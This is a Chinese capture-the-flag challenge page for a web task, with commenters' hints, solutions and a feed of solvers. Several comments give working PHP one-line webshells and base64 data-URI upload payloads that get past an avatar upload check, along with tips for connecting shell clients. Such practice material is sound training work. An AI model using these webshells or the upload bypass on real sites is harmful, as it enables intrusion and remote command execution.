xxx二手交易市场WEB 未解决

分数: 30 金币: 5
题目作者: Aman
一  血: dotast
一血奖励: 5金币
解  决: 2588
提  示:
描  述:
本人现实碰到的题目,无提示勿问
评论
ixin 1月前

image=data%3aimage%2fphp%3bbase64%2cIDw%2fcGhwIGV2YWwoJF9QT1NUWyJjbWQiXSk7Pz4%3d

回复 0

zhuizhui 6月前

在post body构造一句话木马 image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg== url 解码后即为 image=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==

回复 0

llc123 8月前

thinkphp v5.1.35 lts和xss不知道有没有操作空间

回复 0

LoadOverload 8月前

用webacoo亦可解决

回复 0

Zhumeng 1年前

注册账号登录用户会有个头像上传上传一个正常的头像发现被base64编码了,我们将一句话木马进行编码编码后上传将mime类型改成image/php

回复 0

zhuohao 1年前

蚁剑一直返回数据为空 一直连不上

回复 0
hackhui 1年前

一句话木马传参加''

回复 0

LLTVLL 1年前

一句话用这个 <?php eval($_POST['cmd']);?>,好像网上找的有的有问题

回复 0

BlueL1ght 1年前

<?php echo `$_POST[a]`;?>

回复 0

Daniel2023 1年前

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=

回复 1

vchopin 2年前

base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上

回复 0
lzq2000 6月前

大家都知道base64编码是按顺序每三个字符一组进行编码,正常情况下对“;?>”进行base64编码得到的就是“Oz8+”,我们可以调整“;”前面的字符长度,让“;”不与“?>”分在一组编码即可!另外我估计把加号进行url编码应该也可以,我没测试。

回复 0

lzq2000 6月前

不是最后结尾要为“=”,而是结尾不能为“+”,因为“+”会被认为是空格,不参与base64解码,所以解码后会少个大于号“>”,运行这个php时会报错!!!而且一般情况下base64编码后大概率后面会出现“+”

回复 3

WriteUp

image
nic016

5 金币

评分(11)

解题动态

黎悦依 攻破了该题 5小时前
容大晋 攻破了该题 5小时前
潘福演 攻破了该题 5小时前
木秀于林 攻破了该题 5小时前
农群丹 攻破了该题 6小时前
严晓颖 攻破了该题 6小时前
陆美宏 攻破了该题 6小时前
莫泽明 攻破了该题 6小时前
typ11 攻破了该题 6小时前
党玉新 攻破了该题 6小时前
刘德龙 攻破了该题 6小时前
kklff4399 攻破了该题 6小时前
卢思杏 攻破了该题 6小时前
无无 攻破了该题 6小时前
HHHHYY 攻破了该题 6小时前
杨荣涛 攻破了该题 7小时前
叶子璐 攻破了该题 7小时前
何林凤 攻破了该题 7小时前
韦东妙 攻破了该题 7小时前
0622 攻破了该题 7小时前
问题反馈